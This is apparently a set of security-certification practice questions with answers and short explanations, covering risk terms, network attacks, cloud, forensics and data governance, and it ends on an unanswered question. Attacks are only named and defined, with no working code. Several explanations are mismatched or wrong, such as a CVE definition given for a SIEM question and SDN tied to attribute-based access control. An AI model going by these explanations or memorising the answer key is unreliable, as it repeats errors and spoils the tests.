-ARO (The annual rate of occurrence (ARO) indicates how many times a loss will occur within a year. An ARO is used in conjunction with the single loss expectancy (SLE) to figure the annual loss expectancy (ALE).)
A new company implements a datacenter that will hold proprietary data that is output from a daily workflow. As the company has not received any funding, no risk controls are in place. How does the company approach risk during operations? -Acceptance -Transference -Mitigation -Avoidance
-Acceptance (Risk acceptance means that no countermeasures are put in place either because the level of risk does not justify the cost or because there will be an unavoidable delay before the countermeasures are deployed.)
Which of the following attacks would allow an attacker to sniff all traffic on a switched network? -Internet Protocol (IP) spoofing -Domain Name System (DNS) spoofing -Address Resolution Protocol (ARP) poisoning -Transmission Control Protocol/Internet -Protocol (TCP/IP) hijacking
-Address Resolution Protocol (ARP) poisoning (To sniff all traffic on a switched network, the switch must be overcome using ARP poisoning. ARP poisoning occurs when an attacker, with access to the network, redirects an IP address to the MAC address of an unintended computer.)
A logistics facility provides transportation services globally for many clients. Clients require their planning information to be kept in a secure environment not connected to a network until the needs have been fulfilled. Which of the following solutions would be the most ideal method of meeting this requirement for the company? -Mantrap -Container -Faraday cage -Air gap
-Air gap (An air gap is a host that is not physically connected to any network. Air gaps are secure areas that protect resources against unauthorized users and spillage of information.)
A Security Information Event System (SIEM) parses network traffic and log data from multiple sensors, appliances, and hosts to implement correlation rules on metrics derived from data sources. SIEM assists the systems admin to detect events that may be potential incidents. Define the term for notifications passed upon detection of a potential incident. -Alerts -Trends -Sensitivity -Correlation
-Alerts
In a cloud environment, which of the following would be most detrimental in relation to access management of storage resources? -Any wildcard -Encryption -Container namespaces -Private subnet
-Any wildcard (Cloud resource policies configure read and/or write access to resources such as storage or services. Using any wildcard in read or write can break the principle of least privilege and opens up a high risk of exploitation.)
Which of the following is NOT an example of improper or weak application patch management. -Unmanaged assets -Performance degradation -Application design flaw -No documentation
-Application design flaw (An application design flaw is a vulnerability in the software. It can cause the security system to be circumvented or will cause the application to crash. For this reason, proper patch management processes are required to ensure service availability of the application.)
Recommend a strategy for organizing evidence during the e-discovery process of forensic investigation. -Make hardcopies -Organize by timestamps -Apply tags -Record the process on video
-Apply tags (Tags might be used to indicate relevancy to the case or part of the case or to show confidentiality and help organize evidence according to keywords or labels.)
A piece of data that may or may not be relevant to the investigation or incident response such as registry keys, files, time stamps, and event logs are known as what? -Checksums -Tags -Artifacts -Cache
-Artifacts (An artifact is a piece of data, such as registration keys, files, timestamps, and event logs that may or may not be important to the investigative analysis or incident response.)
An engineer outlines a data protection plan. Part of the plan covers the challenges of protecting data in various states of existence. Evaluate the data states and conclude which will require that encryption keys stay safe for the longest period of time. -In motion -At rest -In use -In transit
-At rest (Data at rest is a state where the data is in some type of persistent storage media. There is an encryption challenge with data at rest as the encryption keys must be kept secure for longer.)
A government system uses Public Key Infrastructure to enable users to securely exchange data using both a public and private cryptographic key pair that is obtained and shared through a trusted authority. This process most likely describes which of the following? -2FA -Authentication application -IAM -Something you know authentication
-Authentication application (An authentication application is used to verify access to a user. Authentication applications use various means to identify a user such as static codes, token keys and Public Key Infrastructure.)
A threat actor is using which of the following techniques to circumvent the usual authentication method to a remote host? -Logic bomb -Rootkit -Backdoor -Keylogger
-Backdoor (A backdoor is any type of access method to a host that circumvents the usual authentication method and gives the remote user administrative control.)
A system administrator ensures that the checksum on the developed code checked into the Nexus repository matches the checksum presented to the customer to ensure the finished product is what was agreed upon. This best represents which of the following processes? -Change management -Configuration control -Baseline configuration -Benchmarking
-Baseline configuration (Baseline configurations are documented and agreed-upon sets of specifications for information systems. Baseline configurations serve as the starting point for development, patching, and changes to information systems.)
A small company has set up the domain environment to prevent the installation of a list of prohibited software. Employees received this same list via email. What type of method prevents the installation of specific software on workstations? -Application hardening -Anti-malware -Whitelisting -Blacklisting
-Blacklisting (Execution control, to prevent the use of unauthorized software, can be implemented as a blacklist. This control means that anything not on the prohibited blacklist can run.)
A recent attack on the company involving a threat actor from another country prompted the security team to host regular penetration testing exercises. The recent attack involved the IT team as well as human resources because an employee's desktop was breached. In the upcoming exercise, what role would the human resource team portray along with the IT team to simulate the recent attack and its experiences? -White team -Blue team -Purple team -Red team
-Blue team (The blue team is one of two competing teams in a penetration testing exercise. The blue team performs a defensive role by operating, monitoring, and alerting controls.)
In a software as a service (SaaS) model, where the organization is responsible for the security and patching of the application and its components, which entity would be responsible for providing security services for the infrastructure? -CSP -CASB -IAM -CM
-CSP (The cloud service provider (CSP) would be responsible for the security of the infrastructure. A shared responsibility model includes both the CSP and the customer sharing security aspects of a cloud service model.)
Which of the following is an example of a vulnerability database that a security administrator can use with Tenable Nessus to assess the security state of servers on the network? -STIX -Threat map -CVE -TAXII
-CVE (Common Vulnerabilities and Exposures (CVE) is a database of information about vulnerabilities that are codified as signatures. A vulnerability scanner like Tenable Nessus uses CVE to scan the network to determine the security state of almost any device.)
Which threat actor would benefit the most from industry insider knowledge of a recently acquired employee? -White hat hackers -State actors -Competitor -Criminal syndicate
-Competitor (A company that participates in competitor-driven espionage often targets other competitors to disrupt business and damage reputation. This can increase revenue and profit for the business.)
Which de-identification method does an administrator use when choosing to replace the contents of a data field by redacting and substituting character strings? -Data masking -Tokenization -Pseudo-anonymization -Anonymization
-Data masking (Data masking can mean that all or part of the contents of a field is redacted, by substituting all character strings with "x" for example.)
A software developer enables a security feature commonly known as stack protection but does not execute the source code. Which of the following best describes what the developer is using? -Compiler -Interpreter -Input validator -Vulnerability scanner
-Compiler (A compiler is a program that translates high-level programming language into machine code that can later be executed many times against different data. A compiler does not execute source code.)
Define steganography. -Using a list of approved applications for security purposes -A method of containing malware -Concealing messages or information within other data -Building a plan for dealing with incidents
-Concealing messages or information within other data (Steganography obscures data by embedding it in another format. Messages can be covertly inserted into TCP packets in images by modifying specific pixels and even possibly to embed images or other data into audio files.)
A company runs certain applications within isolated cells according to employee job functions to minimize access to resources on the operating system. This type of virtualization is which of the following? -VPC -Container -Intranet -Hypervisor
-Container (Containers decouple services and applications from a host operating system. Containers run within isolated cells and do not have their own kernel. They allow for continuous integration and continuous delivery.)
Which coding automation concept relates to committing and testing updates often? -Continuous delivery -Continuous integration -Continuous deployment -Continuous monitoring
-Continuous integration (Continuous integration (CI) is the principle that developers should commit and test updates often, such as every day or sometimes even more frequently. For effective CI, it is important to use an automated test suite to validate each build quickly.)
A recent security audit necessitates the need to separate network resources on a departmental level. Admin will implement the separation across hardware and software devices. After analyzing a list of suggestions, which approach provides a complete solution to the problem? -Apply firewall filters -Add a proxy -Create VLANs -Create an airgap
-Create VLANs (A Virtual Local Area Network (VLAN) is a logical group of network devices on the same LAN, despite their geographical distribution. It can divide the devices logically on the data link layer, and group users according to departments.)
A user at a company executes a program that displays a threatening message. The message says "files on the computer will remain encrypted until bitcoin is paid to a virtual wallet." Which of the following best describes this type of infection? -A logic bomb -Crypto-malware -A worm -A mine
-Crypto-malware (Ransomware is a type of Trojan malware that extorts money from the victim. The computer remains locked until the user pays the ransom. Crypto-malware is ransomware that attempts to encrypt data files. The user will be unable to access the files without the private encryption key.)
Which of the following is designed to mitigate losses from cyber incidents such as data breaches, outages, and network damage? -Administrative controls -Clean desk policy -Cybersecurity insurance -Control diversity
-Cybersecurity insurance (Cybersecurity insurance is a product that is offered to individuals and companies to protect them from the effects and consequences of cyber related attacks.)
The local operational network consists of physical electromechanical components controlling valves, motors, and electrical switches. All devices enterprise-wide trust each other in the internal network. Which of the following attacks could overwhelm the network by targeting vulnerabilities in the headers of specific application protocols? -Malicious PowerShell attack -Man-in-the-middle attack -DNS amplification attack -DDoS attack
-DNS amplification attack (Domain name system (DNS) amplification attack is an application attack that targets vulnerabilities in the headers and payloads of specific application protocols. It triggers a short request for a long response at the victim network.)
Which data governance role is responsible for ensuring compliance with legal and regulatory frameworks specifically related to processing, retention, and/or disclosure of personally identifiable information (PII)? -Data Steward -Data Owner -Data Privacy Officer (DPO) -Data Custodian
-Data Privacy Officer (DPO) (The data privacy officer is responsible for the oversight of assets handled by the organization containing personally identifiable information (PII). The Privacy Officer maintains consistency with legislative and regulatory frameworks of the collection, disclosure, and protection of PII.)
An application processes and transmits sensitive data containing personally identifiable information (PII). The development team uses secure coding techniques such as encryption, obfuscation, and code signing. Which of the following is the development team concerned with? -Data execution -Data exfiltration -Data exposure -Public data
-Data exposure (Sensitive data should be protected to prevent data exposure. Secure coding techniques such as encryption, code obfuscation, and signing can prevent data from being exposed and modified.)
A Security Information and Event Management (SIEM) system is heavily dependent on which of the following to provide meaningful information about security events and trends? -Data inputs -Reports -SCAP -Packet captures
-Data inputs (Common Vulnerabilities and Exposures (CVE) is a dictionary of vulnerabilities in published operating systems and applications software provided by cve.mitre.org. It includes CVE ID, brief descriptions, a URL reference list, and data of entry.)
An employee at a financial firm is responsible for ensuring that data is stored in accordance with applicable laws and regulations. What role does the employee have in terms of data governance? -Data steward -Data custodian -Data owner -Data processor
-Data steward
As a part of an effort toward a DevSecOps-based approach, a large tech company establishes a dedicated cyber incident response team (CIRT). The objective of the program is to exchange knowledge and insights and to work together to mitigate threats. Considering the team's need for diversity among team members, decide which type of individual they should include. -System administrator -Privacy officer -Decision maker -Privileged user
-Decision maker (Members of such a team should be able to have the breadth of decision-making and technical expertise necessary to cope with various kinds of accidents. The team should include a person with the authority to authorize intervention.)
After opening a third branch office in another state, the security team is having difficulty monitoring the network and managing system logs. Using a standard Security Information and Event Management (SIEM) system, what can the team do to better manage these events in a centralized way? -Use machine learning -Deploy listeners -Configure aggregation -Use Nikto
-Deploy listeners (A management server can be configured to be a listener or collector to gather logs from multiple sources and parse the data before sending it to the SIEM system. Multiple listeners can better manage collections to reduce the number of systems communicating with the SIEM.)
An engineer enables event logging on a server. Which type of security did the engineer implement? -Detective -Compensating -Corrective -Deterrent
-Detective (A detective control may not prevent or deter access, but it will identify and record any attempted or successful intrusion.)
In which environment can multiple developers check out software code and include change management processes? -Test -Staging -Development -Production
-Development (A development environment is where developers create a product. Developers check out code for editing or updating. Version control and change management occur in the development environment to track development.)
A large business works with a consulting group to develop a business continuity plan. The goal of the plan is to provide a potentially uninterrupted workflow in the event of an incident. Examine the descriptions and determine which one matches this goal. -Recovery of primary business functions when disrupted -Ensuring processing redundancy supports the workflow -Retention of data for a specified period -Performing mission critical functions without IT support
-Ensuring processing redundancy supports the workflow (Business continuity planning identifies how business processes should deal with both minor and disaster-level disruption. It ensures that there is processing redundancy supporting the workflow through failover.)
IT discovers a flaw in a web application where it allows queries without encryption. As a result, requests are being spoofed and directories containing private files are viewable. What is happening? -Extensible Markup Language (XML) injection -Structured Query Language (SQL) injection -Dynamic Link Library (DLL) injection -Lightweight Directory Access Protocol (LDAP) injection
-Extensible Markup Language (XML) injection (Extensible Markup Language (XML) can be used for data exchange. Without encryption, it is vulnerable to spoofing, request forgery, and injection of arbitrary code. For example, an XML External Entity (XXE) attack embeds a request for a local resource.)
Which of the following protocols would secure file transfer services for an internal network? -SSTP -FTPES -LDAPS -DNSSEC
-FTPES (File Transfer Protocol Explicit Secure (FTPES) uses the AUTH TLS command to upgrade an unsecure connection established over port 21 to a secure one. This protects authentication credentials.)
An attacker launches a vishing social engineering attack by impersonating a police officer. The attacker calls the victims and tries to exploit this behavior by demanding the victims give the attacker their name and address immediately. This type of attack does NOT demonstrate what type of social engineering principle? -Urgency -Intimidation -Familiarity/liking -Authority
-Familiarity/liking (One of the basic tools of a social engineer is simply to be affable, likable, and persuasive, and to present the requests they make as completely reasonable and unobjectionable.)
What type of metadata could contain permissions in the form of an Access Control List? -Web metadata -File metadata -Mobile phone metadata -Email metadata
-File metadata (File metadata includes information about when a file was created, accessed, and modified; access control lists defining who is authorized to read or modify the file; copyright information; or tags for indexing are all possible file metadata.)
A systems administrator plans to protect a data center with various security controls and safety mechanisms. Which solution does the administrator plan based on a "triangle" principle? -Motion detection -Industrial camouflage -Fire suppression -Noise detection
-Fire suppression (The fire triangle works on the principle that fire requires heat, oxygen, and fuel to ignite and burn. Removing any one of those elements provides fire suppression.)
Utilities, such as IPFix and Netflow, export a file based on collected IP traffic flow metadata. What is the name of this exported file? -Network log -Throughput record -Flow record -DNS log
-Flow record (Flow analyzers generate flow records, such as IPFix and Netflow, as a history of traffic flow, including timestamps and IP addresses.)
A datacenter requires an instantaneous failover power solution that is inexpensive. Which of the following is the least likely solution for the datacenter? -UPS -Generator -Managed PDU -Dual supply
-Generator (A generator is a device that converts mechanical energy into electrical energy for use in a peripheral circuit. Generators are an expensive option for power failover and do not immediately provide power.)
A Department of Defense (DoD) application is migrating to the cloud using Amazon Web Services (AWS) as the cloud service provider. As part of the service level agreement (SLA) and DOD mandate, the application must remain within the United States of America. AWS offers the application East, Boston and West, Oregon data centers for operations and failover. Which of the following is AWS providing in accordance with the SLA and DoD mandate? -Vendor diversity -Geographical considerations -Regulatory framework -Continuity of operations
-Geographical considerations (Amazon Web Services (AWS) is taking into account geographical considerations. The agreement mandates the system will stay within the United States.)
An application requires continuity of operations within a 24 hour period due to the command and control capabilities it maintains. The failover site must be physically separated from the program office and be available within the required timeframe with live data. Which of the following redundancy solutions best meets the failover requirement? -Meantime between failure -Geographical dispersal -Recovery time objective -Failover clusters
-Geographical dispersal (Geographical dispersal is a failover consideration that replicates data in hot and warm sites physically distanced from one another in the event of a catastrophe.)
For security purposes, mobile devices at an organization must include location metadata on all applicable data. Which method does the policy mandate? -Geotagging -Network location -Geofencing -Geolocation
-Geotagging (Geotagging refers to the addition of location metadata to files or devices. This is often used for asset management to ensure devices are kept with the proper location.)
Which of the following security mechanisms provides protection against Secure Socket Layer (SSL) stripping attacks? -HTTP Strict Transport Security (HSTS) -Secure cookies -Cache-Control -Content Security Policy (CSP)
-HTTP Strict Transport Security (HSTS) (HTTP Strict Transport Security (HSTS) forces browsers to connect using HTTPS only, mitigating downgrade attacks, such as Secure Socket Layer (SSL) stripping.)
Using Unified Extensible Firmware Interface (UEFI) to boot a server, the system must also provide secure boot capabilities. Part of the secure boot process requires a secure boot platform key or self-signed certificate. Determine which of the following an engineer can use to generate keys within the server using an available Peripheral Component Interconnect Express (PCIe) slot. -Trusted platform module -Hardware security module -NFC token -Password vault
-Hardware security module (A hardware security module (HSM) is an appliance designed to perform centralized public key infrastructure (PKI) management, key generation, or key escrow for devices. HSM can also be implemented as a plug-in PCIe adapter card to operate within a device.)
A microfabrication company recently suffered a breach of their R&D servers, from which blueprints and proprietary development documents were downloaded. What is likely the most impactful organizational consequence of this breach? -Fines -Reputation damage -IP-theft -Identity theft
-IP-theft (Theft of intellectual property means stealing innovations, technologies, and artistic expressions from individuals or corporations, known as "intellectual property," which may cover anything from trade secrets and patented products and components.)
A military organization is evaluating its disaster recovery plan (DRP) to assess risk and in particular identify any single points of failure. Suggest an initial action for the organizations evaluation. -Identify critical systems and mission essential functions -Assess site risk -Create a heat map -Renew cybersecurity insurance
-Identify critical systems and mission essential functions (Identifying critical systems and mission essential functions is often the first step of the risk management process, and will reveal any potential single points of failure.)
Which of the following is the service that provisions the user account and processes authentication requests? -Account attribute -Token -Certificate -Identity provider
-Identity provider (The identity provider (IdP) is the service that provisions the user account and processes authentication requests. On a private network, these identity directories and application authorization services can be operated locally.)
A fraudulent credit card purchase is an impact of which of the following? -Identity theft -Availability loss -Reputation damage -Privacy breach
-Identity theft (Identity theft involves stealing someone's identity to perform tasks in their name. For example, a threat actor uses personal details and financial information to make fraudulent credit applications and purchases.)
The financial staff at an organization works with IT and management to determine the risks associated with currently deployed systems. What measure of risk results from this analysis? -Residual risk -Inherent risk -Control risk -Risk appetite
-Inherent risk (The result of quantitative or qualitative analysis is a measure of inherent risk. Inherent risk is the level of risk before any type of mitigation has been attempted.)
Recommend a strategy to establish what witnesses were doing at the scene, whether they observed any suspicious behavior or activity, and to gather information about the computer system. -Video record the investigation -Read digital forensics reports -Interview witnesses -Apply tags
-Interview witnesses
Which of the following is TRUE about false negatives in relation to vulnerability scanning tools? (Select all that apply.) -Is identified -Is not identified -Is a high risk -Is not high risk
-Is a high risk (False negatives are the potential vulnerabilities that are not identified by the scanning tool. It is possible the vulnerability has not been discovered, or a hacker may have spoofed the vulnerability as if nothing is wrong.)
A security administrator protects systems passwords by hashing their related keys. The administrator discovers that this approach does not make the key any stronger or more difficult to crack. Analyze the different security properties and determine which one the administrator implemented. -Digital signatures -Key length -Key exchange -Key stretching
-Key stretching (Key stretching takes a key that is generated from a user password and repeatedly converts it to a longer and more random key.)
A threat actor can exploit an unauthenticated access to submit arbitrary directory queries using which type of attack? -SQL injection -LDAP injection -XML injection -DLL injection
-LDAP injection (A Lightweight Directory Access Protocol (LDAP) attack exploits either unauthenticated access or a vulnerability in a client app to submit arbitrary LDAP queries.)
The NIST Computer Security Incident Handling Guide describes six stages of the incident response lifecycle. Indicate in which stage of the incident response lifecycle the incident response team would review and analyze their response and possibly integrate changes into the team's Incident Response Plan. -Recovery -Preparation -Identification -Lessons learned
-Lessons learned (The "lessons learned" phase occurs when the team's response is evaluated. It is for this reason that it is important to document the entire response process.)
A large firm uses a non-persistent operating system for its remote users. This allows the employees to access company resources while teleworking. When the computers are turned off, the operating system disappears. Which of the following operating systems is the company using? -TPM -Full disk encryption -Live boot media -Trusted operating system
-Live boot media (Live boot media is a non-persistent operating system on a compact disk or USB. Live boot media can be run on any computer to provide the user a complete operating system while the computer is on.)
What would be the highest concern for an e-commerce company whose top priority is to ensure customers can shop online 24/7? -Loss of availability -Increase of fines -Increase of data breaches -Loss of reputation
-Loss of availability (Availability loss in this case is losing redundancy in applications and servers that host and run the e-commerce website. Service availability is important to an e-commerce company that advertises 24/7 services.)
An insider threat gained access to a server room and proceeded with connecting a laptop to the network. The laptop was configured with a spoofed network interface card (NIC) address to remain undetected by the network intrusion detection (IDS) systems. What layer 2 attack can the insider threat perform to disrupt the network? -DNS poisoning -OT DDoS attack -MAC flooding -Domain hijacking
-MAC flooding (Media Access Control (MAC) flooding is a layer 2 network attack. It exhausts the memory used to store a MAC address table on a switch, which results in flooding unicast traffic out of all ports and disrupting all connecting devices and network services.)
Which of the following are deployed similarly to a credit card skimmer? -Keyloggers -Card cloner -Malicious USB plug -Malicious flash drive
-Malicious USB plug (A malicious Universal Serial Bus (USB) charging cable and plug are deployed similar to card skimmers. The device may be placed over a public charging port at airports and other transit locations. The device can then access a smartphone when connected.)
An employee has authorized access to the company's system and intentionally misused the data from that system. What type of attack has occurred? -Social engineering -Passive reconnaissance -Impersonation -Malicious insider threat
-Malicious insider threat
Two organizations plan on forming a partnership to provide systems security services. Part of the onboarding requirements for both sides includes a mutual understanding of quality management processes. Which approach details this requirement? -Service level agreement (SLA) -Non-disclosure agreement (NDA) -Measurement systems analysis (MSA) -Business partnership agreement (BPA)
-Measurement systems analysis (MSA) (Measurement systems analysis (MSA) relates to quality management processes, such as Six Sigma, that make use of quantified analysis methods to determine the effectiveness of a system and may be part of an onboarding requirement.)
A security firm and an organization meet and agree to begin a business relationship. While a contract is not in place yet, what do the parties use to maintain confidentiality and as an intent to work together? -Service level agreement (SLA) -Business partnership agreement (BPA) -Measurement systems analysis (MSA) -Memorandum of understanding (MOU)
-Memorandum of understanding (MOU) (A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together. MOUs are usually intended to be relatively informal and not to act as binding contracts.)
A system administrator implements a process that provides two separate paths from each server node to every disk in a redundant array of inexpensive disks set up to remove a single point of failure. What concept has the administrator implemented? -Multipathing -Load balancing -Longevity -Fault tolerance
-Multipathing (Multipathing allows users to configure multiple input/output (I/O) paths between server nodes and storage arrays into a single device to remove a single point of failure and increase redundancy.)
Evaluate the properties and determine which describes the role of a gateway in an edge computing environment. -Provides the distribution and aggregation of data -Collects and depends upon data for their operation -Incorporated as a data processing layer -Performs some pre-processing of data to enable prioritization
-Performs some pre-processing of data to enable prioritization (Edge gateways perform some pre-processing of data to and from edge devices to enable prioritization. They also perform the wired or wireless connectivity to transfer data to and from the storage and processing networks.)
A user at an organization reports that their mobile payment method may have been hacked. A security engineer determines that a compromise must have occurred through card skimming. Which technology was used for mobile payments? -Bluetooth -Infrared -RFID -NFC
-NFC (Near field communications (NFC) is based on a particular type of radio frequency ID (RFID). NFC sensors and functionality are now commonly incorporated into smartphones. NFC is susceptible to skimming.)
Determine a solution that can combine with a cloud access security broker (CASB) to provide a wholly cloud-hosted platform for client access? -Virtual private cloud endpoint -Next-generation secure web gateway -Geo-redundant storage -On-demand machine resources
-Next-generation secure web gateway (An on-premises next-generation secure web gateway (SWG) is a proxy-based firewall, content filter, and intrusion detection/prevention system that mediates user access to Internet sites and services. Netskope is an example of an SWG product that can include a cloud access security broker (CASB).)
A company stages its computing power in a centralized environment. All workstations run off of one desktop hosted in the data center. When the admin makes changes at individual workstations, the changes only get saved locally, until a user signs off, and the system then reverts back to the previous state. What technology does this represent? -Type 1 hypervisor -Non-persistent VDE -Persistent VDE -Snapshot
-Non-persistent VDE (Non-persistent Virtual Desktop Environments (VDE) utilizes a central desktop through a remote server. When a user accesses logs on to the desktop, changes and work completed are not saved locally long term. As soon as the user logs off, the desktop reverts back to the image on the central location.)
A European company that offers subscription services has recently experienced a data breach wherein private data, including personally identifiable information (PII), was compromised. What step should be taken by the company to avoid regulatory fines or lawsuits? -Hide the occurrence of the breach. -Notify those affected by the breach. -Fix the vulnerability that led to the breach. -Identify the vulnerability that led to the breach.
-Notify those affected by the breach. (Many laws and regulations require immediate notification of all third parties affected by a breach, including the GDPR in the EU. Failing to do so could lead to fines and potential reputation damage.)
There are several ways to check on the status of an online certificate, but some introduce privacy concerns. Consider how each of the following is structured and select the option with the best ability to hide the identity of the certificate requestor. -CRL -OCSP stapling -OCSP -OCSP responder
-OCSP stapling (Stapling addresses the privacy issues surrounding Online Status Certificate Protocol (OCSP) by having the SSL/TLS web server periodically obtain a time-stamped response from the Certificate Authority. Then, when a client submits an OCSP request, the web server returns the time-stamped response.)
A developer is concerned with Cross-Site Scripting (XSS) in the latest deployed version of an application. What should the developer refer to for information regarding critical application security risks? -NIST -AAA protocols -OWASP -FISMA
-OWASP (The Open Web Application Security Project (OWASP) is an online resource that provides resources for secure application development. It offers tools, networking, education, and training to the development community.)
An aviation tracking system maintains flight records for equipment and personnel. The system is a critical command and control system that must maintain an availability rate of 99% for key parameter performance. The cloud service provider (CSP) guarantees a failover to multiple zones if an outage occurs. In addition to the multi-zonal cloud failover, what other backup solution could the system invest in order to maintain data locally? -Offline -Vendor diversity -Control diversity -Sandboxing
-Offline (An offline backup solution would be a good implementation to safeguard the systems data and have it readily available to access in the event of an outage.)
A file system audit shows a malicious account was able to obtain a password database. The malicious account will be able to use the information without interacting with an authentication system. What type of attack will the malicious account be able to perform on systems? -Online password attack -Password spraying attack -Offline password attack -Dictionary attack
-Offline password attack (An offline password attack means that the attacker has managed to obtain a database of password hashes from an Active Directory credential store, for example. A password cracker tool does not need to interact with the authentication system in this case.)
A company's infrastructure and resources are set up in a vault on the second floor of a building. The company is responsible for maintaining services and equipment. Which of the following best describes the company's cloud concept? -On-premise -Hybrid cloud -XaaS -Cloud computing
-On-premise (On-premise computing refers to a company's infrastructure and resources which are all maintained locally in the company. The company is responsible for managing and maintaining assets.)
A user notices several new icons for unknown applications after downloading and installing a free piece of software. IT support determines that the applications are not malicious but are classified as which type of software? -PUPs -Trojans -Fileless viruses -Worms
-PUPs (Potentially unwanted programs (PUP) are software installed alongside a package selected by the user, or perhaps bundled with a new computer system.)
Conclude what type of data has high trade values in black markets, is often anonymized or deidentified for use in scientific research, and when compromised, can lead to its use in blackmail or insurance fraud, as well as cause reputational damage to the responsible organization. -Customer Data -Government Data -Financial Information -Personal health information (PHI)
-Personal health information (PHI) (Personal health information (PHI), such as medical and insurance records, laboratory test results, etc., has a high value in black markets because of its potential use for blackmail and insurance fraud. It is often anonymized and used for research.)
Systems administrators rely on ACLs to determine access to sensitive network data. What control type do the administrators implement? -Detective -Corrective -Preventative -Deterrent
-Preventative (Preventative controls act to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place. An ACL is an example of this control type.)
A systems admin deploys a new infrastructure for an organization. Examine the given descriptions and determine which applies to the technology used with the LDAP protocol. -Forward traffic from one node to another -Resolves names to IP addresses -Provides privilege management and authorization -Automatic method for network address allocation
-Provides privilege management and authorization (Directory services are the principal means of providing privilege management and authorization on an enterprise network. The Lightweight Directory Access Protocol (LDAP) is a protocol used with X.500 format directories.)
Verify the terminology that describes the action of isolating a system or file in order to contain a worm or virus. -Quarantine -Block -Delete -Alert
-Quarantine (Data loss prevention software can deny the offending user(s) access to the original file. The software accomplishes this by encrypting the file in place, or by moving the file to an area isolated from access. This is quarantining a file.)
IT management wants to make it easier for users to request certificates for their devices and web services. The company has multiple intermediate certificate authorities spread out to support multiple geographic locations. In a full chain of trust, which entity would be able to handle processing certificate requests and verifying requester identity? -CSR -RA -CA -OCSP
-RA (A Registration Authority (RA) is a function of certificate enrollment and its services would be combined with a Certificate Authority (CA) in a single CA hierarchy. An RA is responsible for validating and submitting a request on behalf of end users.)
A Local Area Network (LAN) is set up with an Authentication, Authorization, and Account (AAA) server. The AAA server allows remote supplicants to access the LAN through a Network Access Point (NAP). Which of the following best describes the type of remote authentication solution that is set up on the LAN? -RADIUS -802.1x -EAP -PAP
-RADIUS (Remote Authentication Dial-in User Service (RADIUS) is made up of an Authentication, Authorization, and Account (AAA) server, a Network Access Control (NAC) or RADIUS client, and the supplicant. A supplicant is any device that is trying to access the local network remotely.)
A connection cannot be established during a network connection test of a newly deployed WAP (Wireless Access Point) in WPA2 Enterprise (Wi-Fi Protected Access) mode. After checking the wireless controller, the 802.1x option was selected, but another configuration setting did not save. Apply knowledge of the network connection process to determine which of the following did not save. -Enterprise option -Open configuration -EAP authentication option -RADIUS server settings
-RADIUS server settings (A RADIUS (Remote Access Dial-in User Server) is required to complete the 802.1x setup. The wireless controller connects to the RADIUS server with a shared secret key, then credentials can be properly authenticated.)
Evaluate the following properties and determine which set relates to Domain Name System Security Extension (DNSSEC). -Community name, Agent -Public key, Private key -RRset, Signing key -Master key, Transport protocol
-RRset, Signing key (DNS Security Extensions (DNSSEC) help to mitigate spoofing and poisoning attacks. When enabled, a "package" of resource records (called an RRset) is signed with a private key (the Zone Signing Key).)
A cardiovascular patient is sent home with a monitoring device that records and sends data to a healthcare provider when triggered by abnormal cardiac activity. Response time to the data is critical to patient health. Which embedded platform is the medical device using? -Distributed -Real-time -Standalone -Networked
-Real-time (A real-time operating system (RTOS) is in an embedded system intended to serve real-time applications that process data as it comes in. It provides a quicker reaction to external events than a typical operating system.)
An electronic company wants to begin developing a better and faster way to transfer data and power devices over a single cable for general consumer use at home and via the internet. The engineers will need to review current best practices on how data and power are transferred on the wire today. Which of the following activities will provide these engineers with the best information that will support the project? -Review Request for Comments (RFC). -Ask a local competitor. -Attend industry conferences. -Read academic journals.
-Review Request for Comments (RFC). (Request for Comments (RFC) are publications from the Internet Engineering Task Force (IETF) and other related bodies or organizations that detail how certain technologies are used and their best practices. For example, RFC 894 is "A Standard for the Transmission of IP Datagrams over Ethernet Networks.")
Recommend an immediate response that does not require generating new certificates in a scenario where an attacker has compromised a host on a network by spoofing digital certificates. -Install a content filter -Remove all root certificates from host -Install a data loss prevention system -Revoke the host's certificate
-Revoke the host's certificate (Certificate revocation must always be performed if the associated host is compromised. The Key Compromise property of the certification can allow it to be rekeyed to retain the same subject and expiry information.)
A company shares an external drive that allows members to collaborate documentation and products to work simultaneously. The CIO enforces a rule that some users can download files to their local desktop while others can only view files. This is an example of which type of data protection? -Rights management -Least privileged -ABAC -PAM
-Rights management (Rights management allows a rights owner to exert control over data. It enables publishers of information to control what recipients can do with it to prevent unauthorized sharing and data control.)
A company wants to implement a control model that dictates access based on attributes. The company would like to reconfigure the network by making changes from executable files instead of physically reconfiguring. Which of the following should the company implement? -Location-based policy -Least privilege -SDN -RBAC
-SDN (A software defined network (SDN) separates data and control planes in a network. It uses an attribute-based access control (ABAC) that identifies subjects and objects within a policy.)
A network uses a framework for management and monitoring that uses the Data Encryption Standard (DES) and the Advanced Encryption Standard (AES), which encrypts the contents of traps and query responses. Analyze the types of protocols available for management and monitoring, then deduce the protocol utilized. -MIB -SNMPv1 -SNMPv3 -SNMPv2c
-SNMPv3 (Simple Network Management Protocol (SNMP) v3 supports encryption and strong user-based authentication. Instead of community names, the agent is configured with a list of usernames and access permissions.)
An IT technician at a London-based company is setting up a new VoIP system in the CEO's office. The CEO has asked the technician to set up encryption for calls and informs the CEO that session-to-session encryption is implemented at the endpoints. The CEO wants not only the session encrypted but also the call data itself. Recommend a protocol that will encrypt VoIP call data. -HTTPS -SRTP -SIPS -SFTP
-SRTP (SRTP, which stands for Secure Real-time Transport Protocol, provides encryption and authentication for RTP (Real-Time Protocol) data in unicast and multicast data flows. SRTP will encrypt all data sent and received by each SIP endpoint for the entire journey.)
Finance representatives at an organization meet professional standards by providing reports that are highly detailed and designed to be restricted. As members of the American Institute of Certified Public Accountants (AICPA), which standards do the finance representatives follow? -SSAE SOC 2 Type III -SSAE SOC 2 Type II -International Organization for Standardization (ISO) 27K -International Organization for Standardization (ISO) 31000
-SSAE SOC 2 Type II (A Service Organization Control (SOC2) Type II report assesses the ongoing effectiveness of the security architecture over a period of 6-12 months. SOC2 reports are highly detailed and designed to be restricted.)
A system administrator has a file on a Linux server that needs transferring to a client. While working on the client, what tool will the system administrator likely use to complete this task? -Telnet -Remote Desktop -Virtual Private Network -Secure Shell
-Secure Shell (Secure Shell (SSH) is the principal means of obtaining secure remote access to both a UNIX or Linux server. The main uses of SSH are for remote administration, as well as Secure File Transfer (SFTP).)
A data exfiltration attack at a well-known retail company exposes a great deal of private data to the public. A portion of the data details the CEO's political and religious affiliations. When considering data classification types, which has been exposed? -Proprietary -Sensitive -Critical -Confidential
